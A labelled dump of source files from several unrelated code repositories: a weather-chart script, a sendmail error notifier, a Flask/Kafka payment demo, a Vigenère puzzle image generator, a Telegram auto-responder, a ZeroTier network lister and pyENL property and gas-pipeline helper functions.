# csv dir is where the data resides
# where the graph png should be placed.
os.environ['TZ'] = 'US/Eastern'
if (args.dir):
print("args.dir: ", args.dir)
try:
os.chdir(args.dir)
except:
try:
print("trying /var/www/html/weather_obs")
os.chdir('/var/www/html/weather_obs')
except:
print("using start directory")
else:
# todo - doesn't work on windows
try:
os.chdir('/var/www/html/weather_obs')
except:
pass
station = ""
csv_dir = ""
graph_out_dir = ""
now = datetime.datetime.now()
day = str(now.day)
month = str(now.month)
print("month: ", month)
print("day: ", day)
chart_date = now.strftime("%b %d, %Y")
print("chart_date: ", chart_date)
if (args.file):
dt = parse_date_from_station_csv(args.file)
chart_date = dt.strftime("%b %d, %Y")
print(" new chart_date: ", chart_date)
"""
code logic
1. find all files with current month.
2. open and see if equal to date, if not move on to next csv for month until no more
3. process data for chart
- temp wind and gust
"""
if (args.station):
station = args.station
print("station: ", station)
else:
station = "KDCA"
dirlist = os.listdir()
station_file_list = []
target_csv = ""
file_id = station + "_Y" + str(now.year)
fig_png = station + '_current' + '.png'
if (args.chart):
fig_png = str(args.chart)
print("file_id:", file_id)
target_csv = hunt_for_csv(file_id)
print("target_csv: ", target_csv)
if (args.file):
target_csv = str(args.file)
print("file input: ", target_csv)
station = target_csv[0:4]
print("station:", station)
obs1 = read_weather_obs_csv(target_csv)
if obs1.empty:
print("fata error - cannot read file")
if sys.platform.startswith("linux"):
from email_obs_err import *
send_error_email("daily chart")
exit(16)
if(args.listcols):
x = 0
for cols in obs1.columns:
print("column: ", x, " -- ", cols)
x = x+1
sys.exit(0)
# default tablecols for wind
# df[['observation_time','wind_mph','wind_dir','wind_gust_mph','wind_string']]
table_col_list = [9, 19, 17, 21, 16]
if (args.tablecols):
try:
table_col_list = list(map(int, args.tablecols.split(',')))
except:
print("html table list not column intergers")
if (args.table):
weather_obs_html_table(obs1, table_col_list, args.table)
# default
else:
weather_obs_html_table(obs1, table_col_list, 'wind_chart.html')
# print(obs1.shape)
# print(obs1.columns)
print ("bshape", obs1.shape)
obs1.drop(obs1.index[obs1['wind_mph'] == "<no_value_provided>"], inplace = True)
obs1.dropna(how = 'all', subset = ['wind_mph'], inplace = True)
obs1 = obs1.reset_index(drop=True)
print("shape", obs1.shape)
obs1['wind_gust_mph'] = pd.to_numeric(
obs1['wind_gust_mph'], errors='coerce')
obs1['wind_mph'] = pd.to_numeric(obs1['wind_mph'], errors='coerce')
obs2 = obs1.copy(deep=True)
draw_obs_wind_chart(chart_date, fig_png, obs2)
# print(ax.axis())
# date series.
json_out = weather_obs_subset(obs1, table_col_list)
result = json_out.to_json(orient="split", date_format="iso")
parsed = json.loads(result)
print(json.dumps(parsed, indent=4))
date_ser = mdates.date2num(json_out['observation_time'])
y = json_out['wind_mph']
print("len date_ser: ", str(len(date_ser)))
print("len wind_mph(y): ", str(len(y)))
print(date_ser)
print(y)
if (len(y) > 1 ):
print("polyfit: ", str(trendline(date_ser, y)))
print("Max wind speed: ", str(json_out['wind_mph'].max()))
print("Min wind speed: ", str(json_out['wind_mph'].min()))
json_out2 = obs_meta_date_json(station, obs1)
print(json_out2)
```
#### File: jon2allen/weather_obs/email_obs_err.py
```python
import subprocess
from email.message import EmailMessage
def send_email(from_addr, to_addrs, msg_subject, msg_body):
msg = EmailMessage()
msg.set_content(msg_body)
print("from_addr: ", len(from_addr))
print("to_addr: ", len(to_addrs))
msg['From'] = from_addr
msg['To'] = to_addrs
msg['Subject'] = msg_subject
print("msg : ", str(msg.as_bytes()))
sendmail_location = "/usr/sbin/sendmail"
subprocess.run([sendmail_location, "-t", "-oi"], input=msg.as_bytes())
def send_error_email(application):
# email.cfg is a two line text file
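# (line 1 = from address, line 2 = to address), e.g. hypothetically:
#   alerts@example.com
#   admin@example.com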
with open("email.cfg") as f:
from_email_addr = r'{}'.format(f.readline())
to_email_addr = r'{}'.format(f.readline())
from_email_addr = from_email_addr.rstrip('\n')
to_email_addr = to_email_addr.rstrip('\n')
print("sending email")
print("from: ", from_email_addr)
print("to: ", to_email_addr)
msg = "error has occurred in appliation: " + application
subject = msg
send_email(from_email_addr, to_email_addr, subject, msg)
print("finished...")
``` |
{
"source": "jon32446/azure-k8s-helm-kafka-experiment",
"score": 3
} |
#### File: containers/uwsgi-server/server.py
```python
from flask import Flask, request
from flask_json import FlaskJSON, as_json
from kafka import KafkaProducer
from json import loads, dumps
import datetime
# Create the Flask WSGI application
app = Flask(__name__)
# Add Flask-JSON extension to the app
FlaskJSON(app)
@app.route('/')
def get_root():
return "Try /time or /payment\n"
@app.route('/time')
@as_json
def get_time():
return {"now": datetime.datetime.now()}
@app.route('/payment', methods=['GET', 'POST'])
@as_json
def post_pay():
if request.method == 'GET':
return {"usage": "POST from_account, to_account, amount"}
elif request.method == 'POST':
# Get all the fields needed
message = {key: request.form[key] for key in [
"from_account", "to_account", "amount"
]}
message["timestamp"] = datetime.datetime.utcnow().isoformat()
# Publish payment message to Kafka
producer = KafkaProducer(
bootstrap_servers=['kafka.kafka.svc.cluster.local:9092'],
value_serializer=lambda x: dumps(x).encode('utf-8'))
producer.send('payment', value=message)
# Return
return {"status": "payment successful"}
if __name__ == '__main__':
app.run()
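# Illustrative local test (hypothetical host/port; assumes the Kafka bootstrap
# server above is reachable from where the app runs):
#   curl -X POST -d "from_account=A" -d "to_account=B" -d "amount=10" http://localhost:5000/payment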
``` |
{
"source": "jon32446/python-puzzles",
"score": 3
} |
#### File: python-puzzles/word-search-WIP/text_on_image.py
```python
import itertools
import random
import string
from functools import reduce
import PIL
from PIL import Image, ImageDraw, ImageFont
# block of letters
#
# numbers at top, each one is an index into the block, row-wise. these are general clues for the
# rest of the puzzle
#
# lastly, each letter is a colour. the colour will be 255 in all channels except 1, which will
# contain a byte value. these bytes are the final part of the puzzle.
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
WIDTH = 800
HEIGHT = 600
SPACING = 24
STARTX = (WIDTH - SPACING * 16) / 2
STARTY = (HEIGHT - SPACING * 16) / 2
# these appear at the top as numbers, and are indexes into the main block, row-wise
top_message = [
"word search",
"Vigenere",
"rgbtobin"
]
def encode_vigenere(message, key="mosaic"):
message = [ord(m) - ord("A") for m in message.upper() if m in string.ascii_uppercase]
key = [ord(k) - ord("A") for k in key.upper() if k in string.ascii_uppercase]
print(key, message)
c = []
for m, k in zip(message, itertools.cycle(key)):
c.append((m + k) % 26) # c = m + k mod 26
print("".join(chr(ord("A") + i) for i in c))
return "".join(chr(ord("A") + i) for i in c)
def decode_vigenere(cyphertext, key="mosaic"):
cyphertext = [ord(m) - ord("A") for m in cyphertext.upper() if m in string.ascii_uppercase]
key = [ord(k) - ord("A") for k in key.upper() if k in string.ascii_uppercase]
print(key, cyphertext)
m = []
for c, k in zip(cyphertext, itertools.cycle(key)):
m.append((c - k) % 26) # m = c - k mod 26
print("".join(chr(ord("A") + i) for i in m))
return "".join(chr(ord("A") + i) for i in m)
# the block message must not exceed 256 chars - it will be truncated
block_message = "Paul sensed his own tensions decided to practice one of the mindbody lessons " \
"his mother had taught him three quick breaths triggered the responses he fell into the " \
"floating awareness focusing the consciousness aortal dilation avoiding the unfocused " \
"mechanism of consciousness to be conscious by choice"
chars = "".join(i for i in block_message.upper() if i in string.ascii_uppercase)
if len(chars) < 256:
chars += "".join(random.choice(string.ascii_uppercase) for i in range(256 - len(chars)))
hint = "MOSAICVIGENERECYPHER"
chars = encode_vigenere(chars)
# place a hint at the start to indicate that there are words in the block (word search)
chars = "HELLO" + chars
# place the decryption hint in plaintext in the middle of the chars after encoding it
midpoint = (16//2) * 16 # place it on the middle line
chars = chars[:midpoint] + "MOSAICVIGENEREXX" + chars[midpoint:]
# another word search hint at the end, and truncate to 256
chars = chars[:256 - len("GOODBYE")] + "GOODBYE"
for i, c in zip(range(len(chars)), chars):
if i % 16 == 0:
print("")
print("{:>3} {}".format(i, c), end=" ## ")
print("")
# create a lookup table for all the letters, with the positions in the block where the letter can be found
lookup = {}
for c in string.ascii_uppercase:
lookup[c] = [i for i in range(len(chars)) if chars[i] == c]
def encode_lookup(message):
return " ".join(str(random.choice(lookup[c]) + 1 if c in lookup.keys() else "") for c in message)
def encode_min(message):
return " ".join(str(min(lookup[c]) + 1 if c in lookup.keys() else "") for c in message)
top_message = [i.upper() for i in top_message]
top_message_encoded = [encode_lookup(i) for i in top_message]
print(top_message)
print(top_message_encoded)
font = ImageFont.truetype(r"C:\Windows\Fonts\consola.ttf", 25)
img = Image.new("RGBA", (WIDTH, HEIGHT), BLACK)
draw = ImageDraw.Draw(img)
draw.fontmode = "1" # this sets font anti-aliasing off.
for i, encoded_message in enumerate(top_message_encoded):
encoded_width = font.getsize(encoded_message)[0]
draw.text(((WIDTH - encoded_width) / 2, 16 + SPACING * i), encoded_message, WHITE, font=font)
def encode_as_colour(char):
char_value = ord(char)
c = [255, 255, 255]
c[random.randint(0, 2)] = char_value
return tuple(c)
for row in range(16):
for col in range(16):
i = row * 16 + col
draw.text(
(STARTX + col * SPACING, STARTY + row * SPACING),
chars[i],
encode_as_colour(random.choice(string.ascii_uppercase + string.ascii_lowercase)),
font=font
)
draw = ImageDraw.Draw(img)
img.save("text_on_image.png")
``` |
{
"source": "jon4hz/tg-autoresponder",
"score": 2
} |
#### File: jon4hz/tg-autoresponder/autoresponder.py
```python
try:
import asyncio, json, os, sys, aiosqlite
from datetime import datetime
from telethon import TelegramClient, events
from data.message import text as MESSAGE
from data.config import config as config_file
except ImportError as e:
print(f'Error could not import modules - {e}')
raise SystemExit(1)
# check required vars
if not os.environ.get('TELEGRAM_API_ID') or not os.environ.get('TELEGRAM_API_HASH') or not os.environ.get('TELEGRAM_PHONE'):
print("Error: Please set all environment variables!")
sys.exit(1)
# Write config from environment variables
try:
config = {
'telegram': {
'api_id': os.environ.get('TELEGRAM_API_ID'),
'api_hash': os.environ.get('TELEGRAM_API_HASH'),
'phone': os.environ.get('TELEGRAM_PHONE')
},
'database': {
'file': os.environ.get('DATABASE_FILE','data/database.db')
},
'autoresponder': {
'timeout': os.environ.get('AUTORESPONDER_TIMEOUT','60') # in minutes
}
}
except Exception as e:
print(f'{datetime.utcnow()} - Error: {e}')
sys.exit(1)
# Reading configs
try:
# telegram client credentials
API_ID = config['telegram']['api_id']
API_HASH = config['telegram']['api_hash']
PHONE = config['telegram']['phone']
# DB
DB_FILE = config['database']['file']
# Autoresponder
EXCLUDED_USERS = config_file['autoresponder']['excluded_users']
TIMEOUT = config['autoresponder']['timeout']
except Exception as e:
print(f'{datetime.utcnow()} - Error: Could not read variables from config \n - Missing Key: {e}')
sys.exit(1)
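# Hypothetical minimal data/config.py expected by the import above; only
# 'excluded_users' is read from it, everything else comes from the environment:
#   config = {'autoresponder': {'excluded_users': [123456789]}}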
# create client
try:
client = TelegramClient(f'data/{PHONE}', API_ID, API_HASH)
client.session.save()
except Exception as e:
print(f'{datetime.utcnow()} - Error: Could not create client. - {e}')
sys.exit(1)
async def setup_inital_database(database) -> None:
try:
async with aiosqlite.connect(database) as db:
await db.execute('DROP TABLE IF EXISTS data;')
await db.execute('''
CREATE TABLE data(id INTEGER PRIMARY KEY, last_contacted INTEGER);
''')
await db.commit()
except Exception as e:
print(f'{datetime.utcnow()} - Error: could not create database. Aborting now! - {e}')
sys.exit(1)
async def get_data_from_database(database, tg_id) -> int:
try:
async with aiosqlite.connect(database) as db:  # use the function argument, not the global
async with db.execute('SELECT * FROM data WHERE id=?;', (tg_id,)) as cur:
async for row in cur:
return row[1]
except Exception as e:
print(f'{datetime.utcnow()} - Error: {e}')
if "no such table" in str(e):
await setup_inital_database(DB_FILE)
# listener
@client.on(events.NewMessage())
async def handler(event) -> None:
if (event.is_private and
not (await event.get_sender()).bot and
not event.message.out and
event.sender_id not in EXCLUDED_USERS):
# check if user in database
last_contacted = await get_data_from_database(DB_FILE, event.sender_id)
if last_contacted:
if ((datetime.utcnow().timestamp()-last_contacted) /60) > int(TIMEOUT):
# trigger autoresponder
await client.send_message(event.sender_id, reply_to=event.message.id, message=MESSAGE, link_preview=False)
# update last_contacted time
try:
async with aiosqlite.connect(DB_FILE) as db:
await db.execute('UPDATE data SET last_contacted=? WHERE id=?;',
(datetime.utcnow().timestamp(), event.sender_id))
await db.commit()
except Exception as e:
print(f'{datetime.utcnow()} - Error: {e}')
if "no such table" in str(e):
await setup_inital_database(DB_FILE)
else:
# insert user to database
try:
async with aiosqlite.connect(DB_FILE) as db:
await db.execute('INSERT INTO data(id, last_contacted) VALUES (?, ?);',
(event.sender_id, datetime.utcnow().timestamp()))
await db.commit()
except Exception as e:
print(f'{datetime.utcnow()} - Error: {e}')
if "no such table" in str(e):
await setup_inital_database(DB_FILE)
# trigger autoresponder
await client.send_message(event.sender_id, reply_to=event.message.id, message=MESSAGE, link_preview=False)
if __name__ == "__main__":
# check if database file exists
if not os.path.isfile(DB_FILE):
asyncio.run(setup_inital_database(DB_FILE))
# start the client
try:
client.start()
except EOFError:
print(f'\n{datetime.utcnow()} - Error: Please generate the session file first. Execute "sudo docker-compose run autoresponder", fill in the information and start the container again!')
sys.exit(1)
except Exception as e:
print(f'{datetime.utcnow()} - Error: Could not create client. - {e}')
sys.exit(1)
print("Client started...")
client.run_until_disconnected()
print("Client closed...")
``` |
{
"source": "jon77p/ztls",
"score": 2
} |
#### File: jon77p/ztls/ztls.py
```python
import requests
from os import getenv, uname
from sys import argv
def ztls(preferred=None, only_online=False):
API = getenv('ZT_API')
if not API:
print('Error!')
print("'ZT_API' environment variable does not exist!")
exit()
base = 'https://my.zerotier.com/api/'
header = {'Authorization': 'bearer ' + API}
req = requests.get(base + 'network', headers=header).json()
networks = {}
for i in req:
networks[i['config']['name']] = i['id']
results = {}
print()
for network in networks:
if preferred is None or preferred.lower() in network.lower():
results[network] = {}
print(network + ":")
print()
res = requests.get(base + 'network/' + networks[network] + '/member', headers=header).json()
for member in res:
if member['config']['authorized']:
results[network][member['name']] = {}
results[network][member['name']]['name'] = member['name']
results[network][member['name']]['ip'] = member['config']['ipAssignments'][0]
if member['online']:
if uname().sysname == 'Darwin':
results[network][member['name']]['status'] = '\x1b[1;32;40m' + '' + '\x1b[0m'
else:
results[network][member['name']]['status'] = '🌐'
else:
if only_online is False:
if uname().sysname == 'Darwin':
results[network][member['name']]['status'] = '\x1b[1;31;40m' + '' + '\x1b[0m'
else:
results[network][member['name']]['status'] = '⛔️'
else:
continue
print("{0: <20} | {1:<15} | Status: {2}".format(results[network][member['name']]['name'], results[network][member['name']]['ip'], results[network][member['name']]['status']))
print()
if __name__ == "__main__":
if '-online' in argv:
only_online = True
argv.remove('-online')  # remove the flag itself, not just the last argument
else:
only_online = False
if len(argv) == 2:
ztls(argv[1], only_online=only_online)
else:
ztls(only_online=only_online)
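# Example invocations (require a valid ZeroTier API token):
#   ZT_API=<token> python ztls.py                  # all networks, all authorized members
#   ZT_API=<token> python ztls.py home -online     # only online members of networks matching 'home'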
``` |
{
"source": "jon85p/pyENL",
"score": 3
} |
#### File: pyENL/pyENL_fcns/functions.py
```python
from fluids import atmosphere as atm
from fluids import compressible as comp
from fluids import control_valve as cv
from CoolProp.CoolProp import PropsSI as proppyENL
from CoolProp.CoolProp import HAPropsSI as haproppyENP
from pint import _DEFAULT_REGISTRY as pyENLu
try:
pyENLu.load_definitions("units.txt")
except:
pass
parse = pyENLu.parse_units
unit_pyENL = pyENLu.m
# TODO
# Pass the CoolProp functions through a units wrapper!
# CoolProp dictionary
dicc_coolprop = {'DMOLAR':parse('mole/m^3'), 'Dmolar':parse('mole/m^3'),
'D':parse('kg/m^3'), 'DMASS':parse('kg/m^3'), 'Dmass':parse('kg/m^3'),
'HMOLAR':parse('J/mol'), 'Hmolar':parse('J/mol'),
'H':parse('J/kg'), 'HMASS':parse('J/kg'), 'Hmass':parse('J/kg'),
'P':parse('Pa'), 'Q':parse('mol/mol'),
'SMOLAR':parse('J/mol/K'), 'Smolar':parse('J/mol/K'),
'S':parse('J/kg/K'), 'SMASS': parse('J/kg/K'), 'Smass': parse('J/kg/K'),
'T': parse('K'), 'UMOLAR': parse('J/mol'), 'Umolar': parse('J/mol'),
'A': parse('m/s'), 'SPEED_OF_SOUND': parse('m/s'), 'speed_of_sound': parse('m/s'),
'CONDUCTIVITY':parse('W/m/K'), 'L':parse('W/m/K'), 'conductivity':parse('W/m/K'),
'CP0MASS': parse('J/kg/K'), 'Cp0mass': parse('J/kg/K'),
'CP0MOLAR': parse('J/mol/K'), 'Cp0molar': parse('J/mol/K'),
'CPMOLAR': parse('J/mol/K'), 'Cpmolar': parse('J/mol/K'),
'CVMASS': parse('J/kg/K'), 'Cvmass': parse('J/kg/K'), 'O': parse('J/kg/K'),
'CVMOLAR': parse('J/mol/K'), 'Cvmolar': parse('J/mol/K'),
'C':parse('J/kg/K'), 'CPMASS':parse('J/kg/K'), 'Cpmass':parse('J/kg/K'),
'DIPOLE_MOMENT':parse('C*m'), 'dipole_moment':parse('C*m'),
'GAS_CONSTANT': parse('J/mol/K'), 'gas_constant':parse('J/mol/K'),
'GMOLAR': parse('J/mol'), 'Gmolar': parse('J/mol'),
'G': parse('J/kg'), 'GMASS': parse('J/kg'), 'Gmass': parse('J/kg'),
'HELMHOLTZMASS': parse('J/kg'), 'Helmholtzmass': parse('J/kg'),
'HELMHOLTZMOLAR': parse('J/mol'), 'Helmholtzmolar': parse('J/mol'),
'ISOBARIC_EXPANSION_COEFFICIENT': parse('1/K'), 'isobaric_expansion_coefficient': parse('1/K'),
'ISOTHERMAL_COMPRESSIBILITY': parse('1/Pa'), 'isothermal_compressibility': parse('1/Pa'),
'I': parse('N/m'), 'SURFACE_TENSION': parse('N/m'), 'surface_tension': parse('N/m'),
'M': parse('kg/mol'), 'MOLARMASS': parse('kg/mol'), 'MOLAR_MASS': parse('kg/mol'),
'MOLEMASS': parse('kg/mol'), 'molar_mass': parse('kg/mol'),
'molarmass': parse('kg/mol'), 'molemass': parse('kg/mol'),
'PCRIT': parse('Pa'), 'P_CRITICAL': parse('Pa'), 'Pcrit': parse('Pa'),
'p_critical': parse('Pa'), 'pcrit': parse('Pa'), 'PMAX': parse('Pa'),
'P_MAX': parse('Pa'), 'P_max': parse('Pa'), 'pmax': parse('Pa'),
'PMIN': parse('Pa'), 'P_MIN': parse('Pa'), 'P_min': parse('Pa'), 'pmin': parse('Pa'),
'PTRIPLE': parse('Pa'), 'P_TRIPLE': parse('Pa'), 'p_triple': parse('Pa'),
'ptriple': parse('Pa'), 'P_REDUCING': parse('Pa'), 'p_reducing': parse('Pa'),
'RHOCRIT': parse('kg/m^3'), 'RHOMASS_CRITICAL': parse('kg/m^3'),
'rhocrit': parse('kg/m^3'), 'rhomass_critical': parse('kg/m^3'),
'RHOMASS_REDUCING': parse('kg/m^3'), 'rhomass_reducing': parse('kg/m^3'),
'RHOMOLAR_CRITICAL':parse('mol/m^3'), 'rhomolar_critical':parse('mol/m^3'),
'RHOMOLAR_REDUCING':parse('mol/m^3'), 'rhomolar_reducing':parse('mol/m^3'),
'SMOLAR_RESIDUAL': parse('J/mol/K'), 'Smolar_residual': parse('J/mol/K'),
'TCRIT': pyENLu.K, 'T_CRITICAL': pyENLu.K, 'T_critical': pyENLu.K, 'Tcrit': pyENLu.K,
'TMAX': pyENLu.K, 'T_MAX': pyENLu.K, 'T_max': pyENLu.K, 'Tmax': pyENLu.K,
'TMIN': pyENLu.K, 'T_MIN': pyENLu.K, 'T_min': pyENLu.K, 'Tmin': pyENLu.K,
'TTRIPLE': pyENLu.K, 'T_TRIPLE': pyENLu.K, 'T_triple': pyENLu.K, 'Ttriple': pyENLu.K,
'T_FREEZE': pyENLu.K, 'T_freeze': pyENLu.K, 'T_REDUCING': pyENLu.K, 'T_reducing': pyENLu.K,
'V': parse('Pa*s'), 'VISCOSITY': parse('Pa*s'), 'viscosity': parse('Pa*s')}
# TODO: Add the dimensionless properties!
def prop(des, *args):
# des is the desired output property
# Convert to base units; this also verifies that the conversion can be done
# TODO Problem with the unit registry: how to handle it from CoolProp?
# print(args)
query = 'dicc_coolprop["' + des+ '"] * proppyENL("' + des + '",'
for i, arg in enumerate(args):
# If the argument is text, leave it unchanged
if 'str' not in str(arg.__class__):
# Handle the units: convert to the unit implied by the preceding text argument
try:
nuevoarg = arg.to(dicc_coolprop[args[i-1]])
except:
# If it has no units, treat it as dimensionless
# raise Exception("prop() arguments must carry units")
nuevoarg = arg * pyENLu.m/pyENLu.m
query = query + str(nuevoarg.magnitude) + ','
elif i == len(args) - 1:
query += '"' + arg + '")'
else:
query += '"' + arg + '",'
# print(query)
out = eval(query)
#out._REGISTRY = _REGISTRY
return out
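# Hypothetical usage sketch (symbols as defined in this module):
#   rho = prop('D', 'T', 300 * pyENLu.K, 'P', 101325 * pyENLu.Pa, 'Water')
# would return the density of water at 300 K and 1 atm as a Pint quantity in kg/m^3.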
def quadsum(x, y):
return x**2 + y ** 2
def corriente(str1, a, str2, b):
'''
Example user function: a simple relation that finds the current
given a voltage V and a resistance R.
It is called the same way as the property functions.
Example in test/test4.txt
'''
V = ['V', 'v', 'voltaje', 'Voltaje']
R = ['R', 'r', 'resistencia', 'Resistencia']
try:
if str1 in V and str2 in R:
v, r = a, b
if str1 in R and str2 in V:
r, v = a, b
return v / r
except Exception as e:
if 'by zero' in str(e):
raise Exception
else:
# That is: unless the error is a division by zero, raise a
# special exception that will be picked up by the exception
# handling algorithm.
raise ValueError(
'The values required by the function are missing')
def fluids_atmosphere_1976(str1, Z, dt=0):
'''
US Standard Atmosphere 1976 class, which calculates T, P, rho, v_sonic,
mu, k, and g as a function of altitude above sea level.
'''
Za = Z.to("m")
Za = Za.magnitude
obj = atm.ATMOSPHERE_1976(Za, dt)
salida = ['T', 'P', 'rho', 'v_sonic', 'mu', 'k', 'g']
out = [obj.T*pyENLu.K, obj.P*pyENLu.Pa, obj.rho*pyENLu.kg/(pyENLu.m)**3,\
obj.v_sonic*pyENLu.m/pyENLu.s, obj.mu*pyENLu.Pa*pyENLu.s, obj.k*pyENLu.W/(pyENLu.m*pyENLu.K),\
obj.g*pyENLu.m/(pyENLu.s)**2]
if str1 in salida:
salida_fun = out[salida.index(str1)]
# Adjust the unit registry for consistency
salida_fun._REGISTRY = Z._REGISTRY
return salida_fun
else:
raise Exception('Property not listed')
def fluids_atmosphere_nrlmsise00(str1, Z, latitude=0, longitude=0, day=0, seconds=0,
f107=150.0, f107_avg=150.0,
geomagnetic_disturbance_indices=None):
'''
NRLMSISE 00 model for calculating temperature and density of gases in the
atmosphere, from ground level to 1000 km, as a function of time of year,
longitude and latitude, solar activity and earth’s geomagnetic disturbance.
NRLMSISE stands for the US Naval Research Laboratory Mass Spectrometer
and Incoherent Scatter Radar Exosphere model, released in 2001.
pyENL plus: Density of gases in mol/m^3
'''
NA = 6.022140857 * 1e23 # Avogadro number
Za = Z.to("m")
Za = Za.magnitude
mol3 = pyENLu.mol/((pyENLu.m)**3)
obj = atm.ATMOSPHERE_NRLMSISE00(Za, latitude, longitude, day, seconds,
f107, f107_avg,
geomagnetic_disturbance_indices)
salida = ["rho", "T", "P", "He_density", "O_density", "N2_density", "O2_density",
"Ar_density", "H_density", "N_density", "O_anomalous_density"]
out = [obj.rho*pyENLu.kg/(pyENLu.m)**3, obj.T*pyENLu.K, obj.P*pyENLu.Pa, (obj.He_density / NA)*mol3,\
(obj.O_density / NA)*mol3, (obj.N2_density / NA)*mol3, (obj.O2_density / NA)*mol3,\
(obj.Ar_density / NA)*mol3, (obj.H_density / NA)*mol3,\
(obj.N_density / NA)*mol3, (obj.O_anomalous_density / NA)*mol3]
if str1 in salida:
salida_fun = out[salida.index(str1)]
salida_fun._REGISTRY = Z._REGISTRY
return salida_fun
else:
raise Exception('Property not listed')
# PROBLEM: hwm93 and hwm14 work through f2py, which is not ported to Python3
# def fluids_hwm93(str1, Z, latitude=0, longitude=0, day=0, seconds=0,
# f107=150.0, f107_avg=150.0, geomagnetic_disturbance_index=4):
# '''
# Horizontal Wind Model 1993, for calculating wind velocity in the
# atmosphere as a function of time of year, longitude and latitude,
# solar activity and earth’s geomagnetic disturbance.
# '''
#
# obj = atm.hwm93(Z, latitude, longitude, day, seconds,
# f107, f107_avg, geomagnetic_disturbance_index)
#
# salida =
def fluids_Panhandle_A(SG, Tavg, L=None, D=None, P1=None, P2=None,
Q=None, Ts=288.7, Ps=101325.0, Zavg=1, E=0.92):
'''
Calculation function for dealing with flow of a compressible gas in a
pipeline with the Panhandle A formula. Can calculate any of the following,
given all other inputs
Parameters:
SG : float
Specific gravity of fluid with respect to air at the reference temperature and pressure Ts and Ps, [-]
Tavg : float
Average temperature of the fluid in the pipeline, [K]
L : float, optional
Length of pipe, [m]
D : float, optional
Diameter of pipe, [m]
P1 : float, optional
Inlet pressure to pipe, [Pa]
P2 : float, optional
Outlet pressure from pipe, [Pa]
Q : float, optional
Flow rate of gas through pipe, [m^3/s]
Ts : float, optional
Reference temperature for the specific gravity of the gas, [K]
Ps : float, optional
Reference pressure for the specific gravity of the gas, [Pa]
Zavg : float, optional
Average compressibility factor for gas, [-]
E : float, optional
Pipeline efficiency, a correction factor between 0 and 1
Returns:
Q, P1, P2, D, or L : float
The missing input which was solved for [base SI]
'''
# Aa
check = [L, D, P1, P2, Q]
unidades = ["m", "m", "Pa", "Pa", "m**3/s"]
unknowns = check.count(None)
if unknowns != 1:
raise Exception('invalid syntax')
Tavg = Tavg.to("K")
registro = Tavg._REGISTRY
Tavg = Tavg.magnitude
try:
L = L.to("m")
L = L.magnitude
except:
pass
try:
D = D.to("m")
D = D.magnitude
except:
pass
try:
P1 = P1.to("Pa")
P1 = P1.magnitude
except:
pass
try:
P2 = P2.to("Pa")
P2 = P2.magnitude
except:
pass
try:
Q = Q.to("m**3/s")
Q = Q.magnitude
except:
pass
output = comp.Panhandle_A(SG, Tavg, L, D, P1, P2, Q, Ts, Ps, Zavg, E)
if output.imag != 0:
# The answer has an imaginary part; raise an exception
raise Exception
# Reconocer cuál fue la salida
unidad = unidades[check.index(None)]
output = output*pyENLu.parse_units(unidad)
output._REGISTRY = registro
return output
def fluids_Panhandle_B(SG, Tavg, L=None, D=None, P1=None, P2=None,
Q=None, Ts=288.7, Ps=101325.0, Zavg=1, E=0.92):
# Aa
'''
Calculation function for dealing with flow of a compressible gas in a
pipeline with the Panhandle B formula. Can calculate any of the following,
given all other inputs
'''
check = [L, D, P1, P2, Q]
unknowns = check.count(None)
if unknowns != 1:
raise Exception('invalid syntax')
output = comp.Panhandle_B(SG, Tavg, L, D, P1, P2, Q, Ts, Ps, Zavg, E)
if output.imag != 0:
# The answer has an imaginary part; raise an exception
raise Exception
return output
def fluids_Weymouth(SG, Tavg, L=None, D=None, P1=None, P2=None,
Q=None, Ts=288.7, Ps=101325.0, Zavg=1, E=0.92):
'''
Calculation function for dealing with flow of a compressible gas in a
pipeline with the Weymouth formula. Can calculate any of the following,
given all other inputs.
'''
# Aa
check = [L, D, P1, P2, Q]
unknowns = check.count(None)
if unknowns != 1:
raise Exception('invalid syntax')
output = comp.Weymouth(SG, Tavg, L, D, P1, P2, Q, Ts, Ps, Zavg, E)
if output.imag != 0:
# The answer has an imaginary part; raise an exception
raise Exception
return output
def fluids_Spitzglass_high(SG, Tavg, L=None, D=None, P1=None, P2=None, Q=None,
Ts=288.7, Ps=101325.0, Zavg=1, E=1.0):
'''
Calculation function for dealing with flow of a compressible gas in a
pipeline with the Spitzglass (high pressure drop) formula. Can calculate
any of the following, given all other inputs.
'''
# Aa
check = [L, D, P1, P2, Q]
unknowns = check.count(None)
if unknowns != 1:
raise Exception('invalid syntax')
output = comp.Spitzglass_high(SG, Tavg, L, D, P1, P2, Q, Ts, Ps, Zavg, E)
if output.imag != 0:
# The answer has an imaginary part; raise an exception
raise Exception
return output
def fluids_Spitzglass_low(SG, Tavg, L=None, D=None, P1=None, P2=None, Q=None,
Ts=288.7, Ps=101325.0, Zavg=1, E=1.0):
'''
Calculation function for dealing with flow of a compressible gas in a
pipeline with the Spitzglass (low pressure drop) formula. Can calculate
any of the following, given all other inputs.
'''
# Aa
check = [L, D, P1, P2, Q]
unknowns = check.count(None)
if unknowns != 1:
raise Exception('invalid syntax')
output = comp.Spitzglass_low(SG, Tavg, L, D, P1, P2, Q, Ts, Ps, Zavg, E)
if output.imag != 0:
# The answer has an imaginary part; raise an exception
raise Exception
return output
def fluids_Fritzsche(SG, Tavg, L=None, D=None, P1=None, P2=None, Q=None,
Ts=288.7, Ps=101325.0, Zavg=1, E=1):
'''
Calculation function for dealing with flow of a compressible gas in a
pipeline with the Fritzsche formula.
'''
# Aa
check = [L, D, P1, P2, Q]
unknowns = check.count(None)
if unknowns != 1:
raise Exception('invalid syntax')
output = comp.Fritzsche(SG, Tavg, L, D, P1, P2, Q, Ts, Ps, Zavg, E)
if output.imag != 0:
# The answer has an imaginary part; raise an exception
raise Exception
return output
def fluids_Oliphant(SG, Tavg, L=None, D=None, P1=None, P2=None, Q=None,
Ts=288.7, Ps=101325.0, Zavg=1, E=0.92):
'''
Calculation function for dealing with flow of a compressible gas in a
pipeline with the Oliphant formula.
'''
check = [L, D, P1, P2, Q]
unknowns = check.count(None)
if unknowns != 1:
raise Exception('invalid syntax')
output = comp.Oliphant(SG, Tavg, L, D, P1, P2, Q, Ts, Ps, Zavg, E)
if output.imag != 0:
# The answer has an imaginary part; raise an exception
raise Exception
return output
def fluids_Muller(SG, Tavg, mu, L=None, D=None, P1=None, P2=None, Q=None,
Ts=288.7, Ps=101325.0, Zavg=1, E=1):
'''
Calculation function for dealing with flow of a compressible gas in a
pipeline with the Muller formula.
'''
check = [L, D, P1, P2, Q]
unknowns = check.count(None)
if unknowns != 1:
raise Exception('invalid syntax')
